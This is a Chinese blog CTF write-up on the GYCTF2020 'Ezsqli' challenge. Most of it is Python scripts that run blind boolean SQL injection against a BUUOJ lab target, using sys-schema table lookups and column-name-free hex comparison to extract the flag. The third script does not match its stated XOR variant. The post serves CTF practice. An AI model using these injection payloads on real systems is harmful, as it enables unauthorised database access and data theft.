[GYCTF2020]Ezsqli

Sk1y

于 2021-11-11 23:20:22 发布

阅读量705

点赞数 1

分类专栏： CTF刷题记录文章标签： sql 数据库 Web CTF

本文链接：https://blog.csdn.net/RABCDXB/article/details/121278735

版权

CTF刷题记录专栏收录该内容

148 篇文章 19 订阅

订阅专栏

本文探讨了在网络安全环境下，如何利用ASCII位偏移和无列名注入技术进行漏洞探测。通过实例展示了如何构造payload并利用fuzzing进行测试，以及两种方法的具体实现，包括十六进制转换和字符偏移策略。

摘要由CSDN通过智能技术生成

文章目录

- ASCII位偏移
- 参考文章

无列名注入，acii位偏移
在这里插入图片描述
打开环境后，是个查询的东西

输入1  返回Nu1L
输入2  返回V&N
输入其他  返回Error Occured When Fetch Result.

fuzz下，发现过滤了挺多的

import requests
import time

flag = ""
url = 'http://2105be2a-2049-46f5-abfc-a6bf19dc2e59.node4.buuoj.cn:81/'
#库名
#payload = "2||ascii(substr(database(),{},1))>{}"
#表名
payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))>{}'#表名


for i in range(1,100):
    print(i)
    low = 32
    high = 127
    mid = low + ((high-low)>>1)
    while(low < high):
        payload1 = payload.format(i,mid)
        data = {"id":payload1}
        print(data)
        r = requests.post(url,data = data)
        if r.status_code == 429:
            print("too fast")
            time.sleep(0.5)
        if "Nu1L" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = low + ((high-low)>>1)
        print(mid)
        if(mid == 32 or mid == 127):
            break
    flag += chr(mid)
    print(flag)

ASCII位偏移

select (select 'h')>(select 'g');

在这里插入图片描述

select (select 'h')>(select 'i');

在这里插入图片描述
同时mysql会自动识别16进制为字符串

基本是两种方法，原理是一样的
第一种：

2||2>1

即当||后面的成立时，返回Nu1L
第二种：

1^(2<1)

当^后面的不成立时，返回Nu1L
第一种贴一下师傅的wp，原链接：夜幕下的灯火阑珊

# coding:utf-8 
import requests
import time
url = 'http://f0559a5c-d69d-42db-a4d7-564805f5c24b.node4.buuoj.cn:81/'
def str_hex(s): #十六进制转换 fl ==> 0x666c
    res = ''
    for i in s:
        res += hex(ord(i)).replace('0x','')
    res = '0x' + res
    return res

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        
        key = (str_hex(res+chr(mid)))
        #key = res + chr(mid)
        #payload = "1^((select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key)
        payload = '2||((select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))'.format(key)
        print(payload)
        data = {
            'id':payload 
            }
        r = requests.post(url = url,  data = data)
        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Nu1L'  in r.text:
            left = mid + 1
        elif 'Nu1L' not in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    
    res += chr(mid-1) #爆flag
    print(str(mid),res)

第二种因为后面要不成立，稍微改动一下

# coding:utf-8 
import requests
import time
url = 'http://f0559a5c-d69d-42db-a4d7-564805f5c24b.node4.buuoj.cn:81/'
def str_hex(s): #十六进制转换 fl ==> 0x666c
    res = ''
    for i in s:
        res += hex(ord(i)).replace('0x','')
    res = '0x' + res
    return res

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        
        key = (str_hex(res+chr(mid)))
        #key = res + chr(mid)
        #payload = "1^((select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key)
        payload = '2||((select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))'.format(key)
        print(payload)
        data = {
            'id':payload 
            }
        r = requests.post(url = url,  data = data)
        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Nu1L'  in r.text:
            right = mid
        elif 'Nu1L' not in r.text:
            left = mid + 1 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    
    res += chr(mid-1) #爆flag
    print(str(mid),res)